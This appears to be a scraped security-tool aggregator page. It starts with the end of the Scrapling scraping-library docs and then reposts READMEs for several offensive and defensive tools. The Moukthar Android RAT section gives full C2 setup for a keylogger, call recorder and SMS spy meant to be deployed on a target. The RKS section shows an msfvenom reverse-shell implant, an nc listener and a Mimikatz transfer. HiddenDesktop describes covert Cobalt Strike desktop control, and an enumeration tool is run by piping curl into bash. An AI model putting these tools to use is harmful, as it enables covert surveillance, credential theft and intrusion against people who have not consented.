    To be clear, TextHandler is a subclass of Python's str, so all normal operations/methods that work with Python strings will work with it.

  • An element's attributes are not exactly a dictionary but a read-only subclass of mapping called AttributesHandler, so it's faster, and the string values returned are actually TextHandler objects, so all the operations above can be done on them, plus standard dictionary operations that don't modify the data, and more :)

  • Unlike standard dictionaries, here you can search by values too and do partial searches. It might be handy in some cases (returns a generator of matches):

>>> for item in element.attrib.search_values('catalogue', partial=True):
...     print(item)
{'href': 'catalogue/tipping-the-velvet_999/index.html'}

  • Serialize the current attributes to JSON bytes:

>>> element.attrib.json_string
b'{"href":"catalogue/tipping-the-velvet_999/index.html","title":"Tipping the Velvet"}'

  • Convert it to a normal dictionary:

>>> dict(element.attrib)
{'href': 'catalogue/tipping-the-velvet_999/index.html', 'title': 'Tipping the Velvet'}

Scrapling is under active development so expect many more features coming soon :)

More Advanced Usage

There are a lot of deep details skipped here to keep this as short as possible, so to take a deep dive, head to the docs section. I will try to keep it as up to date as possible and add complex examples. There, I will explain points like how to write your own storage system, how to write spiders that don't depend on selectors at all, and more...

Note that implementing your own storage system can be complex, as there are some strict rules, such as inheriting from the same abstract class, following the singleton design pattern used in the other classes, and more. So make sure to read the docs first.

[!IMPORTANT] A website providing detailed library documentation is needed.
I'm trying to rush creating the website, researching new ideas, and adding more features/tests/benchmarks, but time is tight with too many spinning plates between work, personal life, and working on Scrapling. I have been working on Scrapling for months for free, after all.

If you like Scrapling and want it to keep improving then this is a friendly reminder that you can help by supporting me through the sponsor button.

⚑ Enlightening Questions and FAQs

This section addresses common questions about Scrapling; please read it before opening an issue.

How does auto-matching work?

  1. You need to get a working selector and run it at least once with the css or xpath method, with the auto_save parameter set to True, before structural changes happen.
  2. Before returning results to you, Scrapling uses its configured database to save unique properties about that element.
  3. Because everything about the element can be changed or removed, nothing from the element itself can be used as a unique identifier in the database. To solve this issue, I made the storage system rely on two things:

    1. The domain of the URL you gave while initializing the first Adaptor object.
    2. The identifier parameter you passed to the method while selecting. If you didn't pass one, the selector string itself is used as the identifier, but remember that you will have to use it as the identifier value later, when the structure changes and you want to pass the new selector.

    Together, both are used to retrieve the element's unique properties from the database later.

  4. Later, when you enable the auto_match parameter for both the Adaptor instance and the method call, the element's properties are retrieved, Scrapling loops over all elements in the page, each one's unique properties are compared to the unique properties we already have for this element, and a score is calculated for each one.
  5. Comparing elements is not exact; it's more about finding how similar the values are, so everything is taken into consideration, even the values' order, like the order in which the element's class names were written before and the order in which the same class names are written now.
  6. The score for each element is stored in the table, and the element(s) with the highest combined similarity scores are returned.
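Putting the steps above together, here is a small sketch of the save-then-match flow with an explicit identifier; the URL, selector, and identifier name are illustrative:

from scrapling.fetchers import Fetcher

# First run, before any structural changes: save the element's unique properties
page = Fetcher(auto_match=True).get('https://example.com/products')
element = page.css_first('#p1', auto_save=True, identifier='first-product')

# Later, after the website changes: same identifier, and Scrapling relocates it
page = Fetcher(auto_match=True).get('https://example.com/products')
element = page.css_first('#p1', auto_match=True, identifier='first-product')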

How does the auto-matching work if I didn't pass a URL while initializing the Adaptor object?

Not a big problem, as it depends on your usage. The word default will be used in place of the URL field while saving the element's unique properties. So this will only be an issue if you later use the same identifier for a different website that you also initialized without a URL. The save process will overwrite the previous data, and auto-matching uses only the latest saved properties.

If all things about an element can change or get removed, what are the unique properties to be saved?

For each element, Scrapling will extract:

  • The element's tag name, text, attributes (names and values), siblings (tag names only), and path (tag names only).
  • The element's parent tag name, attributes (names and values), and text.

I have enabled the auto_save/auto_match parameter while selecting and it got completely ignored with a warning message

That's because passing the auto_save/auto_match argument without setting auto_match to True while initializing the Adaptor object results in the auto_save/auto_match argument being ignored. This behavior is purely for performance reasons, so the database gets created only when you are planning to use the auto-matching features.

I have done everything as the docs but the auto-matching didn't return anything, what's wrong?

It could be one of these reasons:

  1. No data was saved/stored for this element before.
  2. The selector passed is not the one used while storing the element's data. The solution is simple:
     • Pass the old selector again as the identifier to the method called.
     • Or retrieve the element with the retrieve method using the old selector as the identifier, then save it again with the save method using the new selector as the identifier.
     • Start using the identifier argument more often if you plan to change selectors from now on.
  3. The website had some extreme structural changes, like a whole new design. If this happens a lot with a website, the solution is to make your code as selector-free as possible using Scrapling's features.

Can Scrapling replace code built on top of BeautifulSoup4?

Pretty much yeah, almost all features you get from BeautifulSoup can be found or achieved in Scrapling one way or another. In fact, if you see there's a feature in bs4 that is missing in Scrapling, please make a feature request from the issues tab to let me know.

Can Scrapling replace code built on top of AutoScraper?

Of course, you can find elements by text/regex, find similar elements in a more reliable way than AutoScraper, and finally save/retrieve elements manually to use later as the model feature in AutoScraper. I have pulled all top articles about AutoScraper from Google and tested Scrapling against examples in them. In all examples, Scrapling got the same results as AutoScraper in much less time.

Is Scrapling thread-safe?

Yes, Scrapling instances are thread-safe. Each Adaptor instance maintains its own state.
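Given that, running independent Fetcher/Adaptor instances across threads is straightforward; a minimal sketch:

from concurrent.futures import ThreadPoolExecutor
from scrapling.fetchers import Fetcher

def scrape(url):
    # Each call uses its own Fetcher and Adaptor state
    page = Fetcher(auto_match=False).get(url)
    return url, page.css('.quote .text::text')

urls = [f'https://quotes.toscrape.com/page/{n}/' for n in range(1, 4)]
with ThreadPoolExecutor(max_workers=3) as pool:
    for url, quotes in pool.map(scrape, urls):
        print(url, len(quotes))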


Contributing

Everybody is invited and welcome to contribute to Scrapling. There is a lot to do!

Please read the contributing file before doing anything.

Disclaimer for Scrapling Project

[!CAUTION] This library is provided for educational and research purposes only. By using this library, you agree to comply with local and international laws regarding data scraping and privacy. The authors and contributors are not responsible for any misuse of this software. This library should not be used to violate the rights of others, for unethical purposes, or to use data in an unauthorized or illegal manner. Do not use it on any website unless you have permission from the website owner or within their allowed rules like the robots.txt file, for example.

License

This work is licensed under BSD-3

Acknowledgments

This project includes code adapted from:

  • Parsel (BSD License) - used for the translator submodule

Thanks and References

Known Issues

  • In the auto-matching save process, only the unique properties of the first element from the selection results are saved. So if the selector you are using matches different elements on the page in different locations, auto-matching will probably return only the first element when you relocate it later. This doesn't apply to combined CSS selectors (using commas to combine more than one selector, for example), as those selectors get separated and each one is executed alone.

Designed & crafted with ❀️ by Karim Shoair.



Moukthar - Android Remote Administration Tool

By: Unknown


Remote administration tool for Android

Features

  • Permissions bypass (Android 12 and below) https://youtube.com/shorts/-w8H0lkFxb0
  • Keylogger https://youtube.com/shorts/Ll9dNrkjFOA
  • Notifications listener
  • SMS listener
  • Phone call recording
  • Image capturing and screenshots
  • Video recording
  • Persistence
  • Read & write contacts
  • List installed applications
  • Download & upload files
  • Get device location

Installation

  • Clone the repository:

git clone https://github.com/Tomiwa-Ot/moukthar.git

  • Install php, composer, mysql, the php-mysql driver, apache2, and a2enmod.
  • Move the server files to /var/www/html/ and install dependencies:

mv moukthar/Server/* /var/www/html/
cd /var/www/html/c2-server
composer install
cd /var/www/html/web-socket/
composer install
cd /var/www
chown -R www-data:www-data .
chmod -R 777 .

    The default credentials are username: android and password: android

  • Create a new SQL user:

CREATE USER 'android'@'localhost' IDENTIFIED BY 'your-password';
GRANT ALL PRIVILEGES ON *.* TO 'android'@'localhost';
FLUSH PRIVILEGES;

  • Set the database credentials in c2-server/.env and web-socket/.env
  • Execute database.sql
  • Start the web socket server or deploy it as a service on Linux:

php Server/web-socket/App.php
# OR
sudo mv Server/websocket.service /etc/systemd/system/
sudo systemctl daemon-reload
sudo systemctl enable websocket.service
sudo systemctl start websocket.service
  • Modify /etc/apache2/sites-available/000-default.conf:

<VirtualHost *:80>
    ServerAdmin webmaster@localhost
    DocumentRoot /var/www/html/c2-server
    DirectoryIndex app.php
    Options -Indexes

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

  • Modify /etc/apache2/apache2.conf: comment out this section

# <Directory />
#     Options FollowSymLinks
#     AllowOverride None
#     Require all denied
# </Directory>

    and add this:

<Directory /var/www/html/c2-server>
    Options -Indexes
    DirectoryIndex app.php
    AllowOverride All
    Require all granted
</Directory>

  • Increase the PHP max file upload size in /etc/php/./apache2/php.ini:

; Increase size to permit large file uploads from client
upload_max_filesize = 128M
; Set post_max_size to upload_max_filesize + 1
post_max_size = 129M

  • Set the web socket server address in the <script> tag in c2-server/src/View/home.php and c2-server/src/View/features/files.php:

const ws = new WebSocket('ws://IP_ADDRESS:8080');

  • Restart apache using the command below:

sudo a2enmod rewrite && sudo service apache2 restart

  • Set the C2 server and web socket server addresses in client functionality/Utils.java:

public static final String C2_SERVER = "http://localhost";
public static final String WEB_SOCKET_SERVER = "ws://localhost:8080";

  • Compile the APK using Android Studio and deploy it to the target.

Screenshots

TODO

  • Auto scroll logs on dashboard
  • Screenshot not working
  • Image/Video capturing doesn't work when application isn't in focus
  • Downloading files in app using DownloadManager not working
  • Listing constituents of a directory doesn't list all files/folders


Linux-Smart-Enumeration - Linux Enumeration Tool For Pentesting And CTFs With Verbosity Levels

By: Zion3R


First, a couple of useful oneliners ;)

wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

Note that since version 2.10 you can serve the script to other hosts with the -S flag!


linux-smart-enumeration

Linux enumeration tools for pentesting and CTFs

This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.

Unlike LinEnum, lse tries to gradually expose the information depending on its importance from a privesc point of view.

What is it?

This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.

From version 2.0 it is mostly POSIX compliant and tested with shellcheck and posh.

It can also monitor processes to discover recurrent program executions. It monitors while executing all the other tests, so you save some time. By default, it monitors for 1 minute, but you can choose the watch time with the -p parameter.

It has 3 levels of verbosity so you can control how much information you see.

At the default level, you should see the highly important security flaws in the system. Level 1 (./lse.sh -l1) shows interesting information that should help you privesc. Level 2 (./lse.sh -l2) will just dump all the information it gathers about the system.

By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.

How to use it?

The idea is to get the information gradually.

First you should execute it just like ./lse.sh. If you see some green yes!, you probably already have some good stuff to work with.

If not, you should try the level 1 verbosity with ./lse.sh -l1 and you will see some more information that can be interesting.

If that does not help, level 2 will just dump everything you can gather about the service using ./lse.sh -l2. In this case, you might find it useful to use ./lse.sh -l2 | less -r.

You can also select what tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro.

Use: ./lse.sh [options]

OPTIONS
-c Disable color
-i Non interactive mode
-h This help
-l LEVEL Output verbosity level
0: Show highly important results. (default)
1: Show interesting results.
2: Show all gathered information.
-s SELECTION Comma separated list of sections or tests to run. Available
sections:
usr: User related tests.
sud: Sudo related tests.
fst: File system related tests.
sys: System related tests.
sec: Security measures related tests.
ret: Recurrent tasks (cron, timers) related tests.
net: Network related tests.
srv: Services related tests.
pro: Processes related tests.
sof: Software related tests.
ctn: Container (docker, lxc) related tests.
cve: CVE related tests.
Specific tests can be used with their IDs (i.e.: usr020,sud)
-e PATHS Comma separated list of paths to exclude. This allows you
to do faster scans at the cost of completeness
-p SECONDS Time that the process monitor will spend watching for
processes. A value of 0 will disable any watch (default: 60)
-S Serve the lse.sh script in this host so it can be retrieved
from a remote host.

Is it pretty?

Usage demo

Also available in webm video


Level 0 (default) output sample


Level 1 verbosity output sample


Level 2 verbosity output sample


Examples

Direct execution oneliners

bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i


Moukthar - Android Remote Administration Tool

By: Zion3R


Remote administration tool for Android


Features
  • Notifications listener
  • SMS listener
  • Phone call recording
  • Image capturing and screenshots
  • Persistence
  • Read & write contacts
  • List installed applications
  • Download & upload files
  • Get device location

Installation
  • Clone the repository:

git clone https://github.com/Tomiwa-Ot/moukthar.git

  • Move the server files to /var/www/html/ and install dependencies:

mv moukthar/Server/* /var/www/html/
cd /var/www/html/c2-server
composer install
cd /var/www/html/web\ socket/
composer install

    The default credentials are username: android and password: the rastafarian in you

  • Set the database credentials in c2-server/.env and web socket/.env
  • Execute database.sql
  • Start the web socket server or deploy it as a service on Linux:

php Server/web\ socket/App.php
# OR
sudo mv Server/websocket.service /etc/systemd/system/
sudo systemctl daemon-reload
sudo systemctl enable websocket.service
sudo systemctl start websocket.service

  • Modify /etc/apache2/apache2.conf:

<Directory /var/www/html/c2-server>
    Options -Indexes
    DirectoryIndex app.php
    AllowOverride All
    Require all granted
</Directory>

  • Set the C2 server and web socket server addresses in client functionality/Utils.java:

public static final String C2_SERVER = "http://localhost";
public static final String WEB_SOCKET_SERVER = "ws://localhost:8080";

  • Compile the APK using Android Studio and deploy it to the target.


TODO
  • Auto scroll logs on dashboard


RKS - A Script To Automate Keystrokes Through A Graphical Desktop Program

By: Zion3R


A script to automate keystrokes through an active remote desktop session that assists offensive operators in combination with living off the land techniques.


About RKS (RemoteKeyStrokes)

All credit goes to nopernik for making this possible, and I took it upon myself to improve it. I wanted something that helps during the post-exploitation phase when executing commands through a remote desktop.


Help Menu
$ ./rks.sh -h
Usage: ./rks.sh (RemoteKeyStrokes)
Options:
-c, --command <command | cmdfile> Specify a command or a file containing commands to execute
-i, --input <input_file> Specify the local input file to transfer
-o, --output <output_file> Specify the remote output file to transfer
-m, --method <method> Specify the file transfer or execution method
(For file transfer "base64" is set by default if
not specified. For execution method "none" is set
by default if not specified)

-p, --platform <operating_system> Specify the operating system (windows is set by
default if not specified)

-w, --windowname <name> Specify the window name for graphical remote
program (freerdp is set by default if not
specified)

-h, --help Display this help message

Usage

Internal Reconnaissance
  • When running in command prompt
$ cat recon_cmds.txt
whoami /all
net user
net localgroup Administrators
net user /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Domain Computers" /domain

$ ./rks.sh -c recon_cmds.txt

Execute Implant
  • Execute an implant while reading the contents of the payload in powershell.
$ msfvenom -p windows/x64/shell_reverse_tcp lhost=<IP> lport=4444 -f psh -o implant.ps1

$ ./rks.sh -c implant.ps1

$ nc -lvnp 4444

File Transfer
  • Transfer a file remotely when pivoting in an isolated network. If you want to specify the remote path on Windows, be sure to include quotes.
$ ./rks.sh -i /usr/share/powersploit/Privesc/PowerUp.ps1 -o script.ps1

$ ./rks.sh -i /usr/share/powersploit/Exfiltration/Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m base64

Specify Graphical Remote Software
  • If you're targeting VNC network protocols, you can specify the window name with tightvnc.

$ ./rks.sh -i implant.ps1 -w tightvnc

  • If you're targeting legacy operating systems with older RDP authentication, specify the window name with rdesktop.

$ ./rks.sh -i implant.bat -w rdesktop
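Window targeting like this is typically implemented with xdotool: find the window by name, focus it, and synthesize keystrokes into it. A minimal sketch of the approach (assuming xdotool is installed; this shows the general technique rather than RKS's exact code):

WIN=$(xdotool search --name "rdesktop" | head -n 1)    # locate the remote desktop window
xdotool windowactivate --sync "$WIN"                   # focus it
xdotool type --window "$WIN" --delay 50 "whoami /all"  # type a command into it
xdotool key --window "$WIN" Return                     # press Enter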


TODO and Help Wanted
  • Add text colors for a better user experience
  • Implement Base64 file transfer
  • Implement Bin2Hex file transfer
  • Implement a persistence function for both Windows and Linux
  • Implement an anti-forensics function for both Windows and Linux
  • Implement reading shellcode input and running it via a C# implant or a PowerShell runspace
  • Implement a privilege escalation function for both Windows and Linux



HiddenDesktop - HVNC For Cobalt Strike

By: Zion3R


Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved, but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke and its forks, which are written in C++.

There are four components of Hidden Desktop:

  1. BOF initializer: Small program responsible for injecting the HVNC code into the Beacon process.

  2. HVNC shellcode: PIC implementation of TinyNuke HVNC.

  3. Server and operator UI: Server that listens for connections from the HVNC shellcode and a UI that allows the operator to interact with the remote desktop. Currently only supports Windows.

  4. Application launcher BOFs: Set of Beacon Object Files that execute applications in the new desktop.


Usage

Download the latest release or compile yourself using make. Start the HVNC server on a Windows machine accessible from the teamserver. You can then execute the client with:

HiddenDesktop <server> <port>
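For example, if the HVNC server is reachable at 192.168.1.5 on port 8080 (placeholder values):

HiddenDesktop 192.168.1.5 8080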

You should see a new blank window on the server machine. The BOF does not execute any applications by default. You can use the application launcher BOFs to execute common programs on the new desktop:

hd-launch-edge
hd-launch-explorer
hd-launch-run
hd-launch-cmd
hd-launch-chrome

You can also launch programs through File Explorer using the mouse and keyboard. Other applications can be executed using the following command:

hd-launch <command> [args]
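For instance, to start Notepad on the hidden desktop (a hypothetical invocation following the syntax above):

hd-launch notepad.exe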

Demo

Demo video: Hidden.Desktop.mp4

Implementation Details

  1. The Aggressor script generates random pipe and desktop names. These are passed to the BOF initializer as arguments. The desktop name is stored in CS preferences at execution and is used by the application launcher BOFs. HVNC traffic is forwarded back to the team server using rportfwd. Status updates are sent back to Beacon through a named pipe.
  2. The BOF initializer starts by resolving the required modules and functions, then resolves the arguments passed from the Aggressor script. A pointer to a structure containing the arguments and function addresses is passed to the InputHandler function in the HVNC shellcode. The shellcode is executed with BeaconInjectProcess, meaning the behavior can be customized in a Malleable C2 profile or with process injection BOFs; this also lets the BOF exit while the HVNC shellcode continues running. You could modify Hidden Desktop to target remote processes, but this is not currently supported.
  3. InputHandler creates a new named pipe for Beacon to connect to. Once a connection has been established, the specified desktop is opened (OpenDesktopA) or created (CreateDesktopA). A new socket is established through a reverse port forward (rportfwd) to the HVNC server. The input handler creates a new thread for the DesktopHandler function described below. This thread will receive mouse and keyboard input from the HVNC server and forward it to the desktop.
  4. DesktopHandler establishes an additional socket connection to the HVNC server through the reverse port forward. This thread will monitor windows for changes and forward them to the HVNC server.
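For reference, the reverse port forward mentioned above is the standard Beacon feature; in a Beacon console it takes the general form below (values are placeholders, and the Aggressor script sets this up automatically):

rportfwd 8080 <hvnc-server-host> 8080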

Compatibility

The HiddenDesktop BOF was tested using example.profile on the following Windows versions/architectures:

  • Windows Server 2022 x64
  • Windows Server 2016 x64
  • Windows Server 2012 R2 x64
  • Windows Server 2008 x86
  • Windows 7 SP1 x64

Known Issues

  • The start menu is not functional.



Polaris - Validation Of Best Practices In Your Kubernetes Clusters

By: Zion3R


Polaris is an open source policy engine for Kubernetes that validates and remediates resource configuration. It includes 30+ built-in configuration policies, as well as the ability to build custom policies with JSON Schema. When run on the command line or as a mutating webhook, Polaris can automatically remediate issues based on policy criteria.

Polaris can be run in three different modes:

  • As a dashboard - Validate Kubernetes resources against policy-as-code.
  • As an admission controller - Automatically reject or modify workloads that don't adhere to your organization's policies.
  • As a command-line tool - Incorporate policy-as-code into the CI/CD process to test local YAML files.
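As a quick illustration of the dashboard and command-line modes (flag names as documented by Polaris; treat this as a sketch and confirm against docs.fairwinds.com):

# audit local YAML manifests, e.g. in a CI pipeline
polaris audit --audit-path ./deploy/
# run the local dashboard
polaris dashboard --port 8080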


Documentation

Check out the documentation at docs.fairwinds.com

Join the Fairwinds Open Source Community

The goal of the Fairwinds Community is to exchange ideas, influence the open source roadmap, and network with fellow Kubernetes users. Chat with us on Slack or join the user group to get involved!

Other Projects from Fairwinds

Enjoying Polaris? Check out some of our other projects:

  • Goldilocks - Right-size your Kubernetes Deployments by comparing your memory and CPU settings against actual usage
  • Pluto - Detect Kubernetes resources that have been deprecated or removed in future versions
  • Nova - Check to see if any of your Helm charts have updates available
  • rbac-manager - Simplify the management of RBAC in your Kubernetes clusters

Or check out the full list

Fairwinds Insights

If you're interested in running Polaris in multiple clusters, tracking the results over time, integrating with Slack, Datadog, and Jira, or unlocking other functionality, check out Fairwinds Insights, a platform for auditing and enforcing policy in Kubernetes clusters.



Scanner-and-Patcher - A Web Vulnerability Scanner And Patcher

By: Zion3R


This tool is very helpful for finding vulnerabilities in web applications.

  • A web application scanner explores a web application by crawling through its web pages and examines it for security vulnerabilities, which involves generating malicious inputs and evaluating the application's responses.
    • These scanners are automated tools that scan web applications for security vulnerabilities. They test web applications for common security problems such as cross-site scripting (XSS), SQL injection, and cross-site request forgery (CSRF).
    • This scanner uses different tools like nmap, dnswalk, dnsrecon, dnsenum, dnsmap etc. in order to scan ports, sites, hosts and networks for vulnerabilities like OpenSSL CCS Injection, Slowloris, Denial of Service, etc.

Tools Used

 1. whatweb         2. nmap
 3. golismero       4. host
 5. wget            6. uniscan
 7. wafw00f         8. dirb
 9. davtest        10. theharvester
11. xsser          12. fierce
13. dnswalk        14. dnsrecon
15. dnsenum        16. dnsmap
17. dmitry         18. nikto
19. whois          20. lbd
21. wapiti         22. devtest
23. sslyze

Working

Phase 1

  • Run the scanner as python3 web_scan.py https://example.com (or http://).
  • The program first records its start time, then builds the URL as "www.example.com".
  • Next, it checks the internet connection using ping.
  • Functionality:
    • --help opens the help menu; --update updates the scanner
    • Press CTRL+C to skip the current scan/test
    • Press CTRL+Z to quit the scanner
    • The program reports the scanning time each tool takes for a specific test.

Phase 2

  • From here the main function of the scanner starts:
  • The scanner automatically selects a tool and starts scanning.
  • The scanners to be used and filename rotation are preconfigured (enabled by default, set to 1).
  • The command used to launch each tool (with its parameters and extra options) is already defined in the code.
  • After finding a vulnerability in the web application, the scanner classifies it in a specific format:
    • [Response + Severity (c - critical | h - high | m - medium | l - low | i - informational) + Reference for Vulnerability Definition and Remediation]
    • Here c (critical) marks the most severe findings, whereas l (low) marks the least vulnerable systems.

Definitions:-

  • Critical:- Vulnerabilities that score in the critical range usually have most of the following characteristics: exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices. Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.

  • High:- An attacker can fully compromise the confidentiality, integrity or availability of a target system without specialized access, user interaction or circumstances that are beyond the attacker's control. Such flaws are very likely to allow lateral movement and escalation of the attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges, significant data loss or downtime.

  • Medium:- An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker's control may be required for an attack to succeed. Such vulnerabilities are very likely to be used in conjunction with other vulnerabilities to escalate an attack. Examples include: vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics; denial of service vulnerabilities that are difficult to set up; exploits that require an attacker to reside on the same local network as the victim; vulnerabilities where exploitation provides only very limited access; and vulnerabilities that require user privileges for successful exploitation.

  • Low:- An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker's control are required for an attack to succeed, and the flaw needs to be used in conjunction with other vulnerabilities to escalate an attack.

  • Info:- An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information an attacker obtains might be used to craft a more accurate attack at a later date. It is recommended to restrict information disclosure as far as possible.

  • CVSS v3 Score Range    Severity in Advisory
    0.1 - 3.9              Low
    4.0 - 6.9              Medium
    7.0 - 8.9              High
    9.0 - 10.0             Critical

Vulnerabilities

  • After this, the scanner will show results which include:
    • Response time
    • Total time for scanning
    • Class of vulnerability

Remediation

  • The scanner then explains the harmful effects of that specific type of vulnerability.
  • It points to sources (websites) to learn more about the vulnerabilities.
  • Finally, it suggests some remedies to overcome the vulnerabilities.

Phase 3

  • The scanner will generate a proper report including:
    • Total number of vulnerabilities scanned
    • Total number of vulnerabilities skipped
    • Total number of vulnerabilities detected
    • Time taken for the total scan
    • Details about each and every vulnerability
  • For debugging purposes, the complete output generated by all the tools is written to SA-Debug-ScanLog in the same directory.

Use

Run the program as python3 web_scan.py https://example.com (or http://). Use --help for the help menu and --update to update the scanner.
Vulnerabilities to Scan:
 1. IPv6                          2. Wordpress
 3. SiteMap/Robot.txt             4. Firewall
 5. Slowloris Denial of Service   6. HEARTBLEED
 7. POODLE                        8. OpenSSL CCS Injection
 9. FREAK                        10. Firewall
11. LOGJAM                       12. FTP Service
13. STUXNET                      14. Telnet Service
15. LOG4j                        16. Stress Tests
17. WebDAV                       18. LFI, RFI or RCE
19. XSS, SQLi, BSQL              20. XSS Header not present
21. Shellshock Bug               22. Leaks Internal IP
23. HTTP PUT DEL Methods         24. MS10-070
25. Outdated                     26. CGI Directories
27. Interesting Files            28. Injectable Paths
29. Subdomains                   30. MS-SQL DB Service
31. ORACLE DB Service            32. MySQL DB Service
33. RDP Server over UDP and TCP  34. SNMP Service
35. Elmah                        36. SMB Ports over TCP and UDP
37. IIS WebDAV                   38. X-XSS Protection

Installation

git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
cd Scanner-and-Patcher/setup
python3 -m pip install --no-cache-dir -r requirements.txt
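After installation, a typical first run looks like this (per the usage line above; example.com is a placeholder):

cd ..
python3 web_scan.py https://example.com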

Contributions

Template contributions, feature requests and bug reports are more than welcome.

Authors

GitHub: @Malwareman007
GitHub: @Riya73
GitHub: @nano-bot01

Contributing

Contributions, issues and feature requests are welcome!
Feel free to check the issues page.


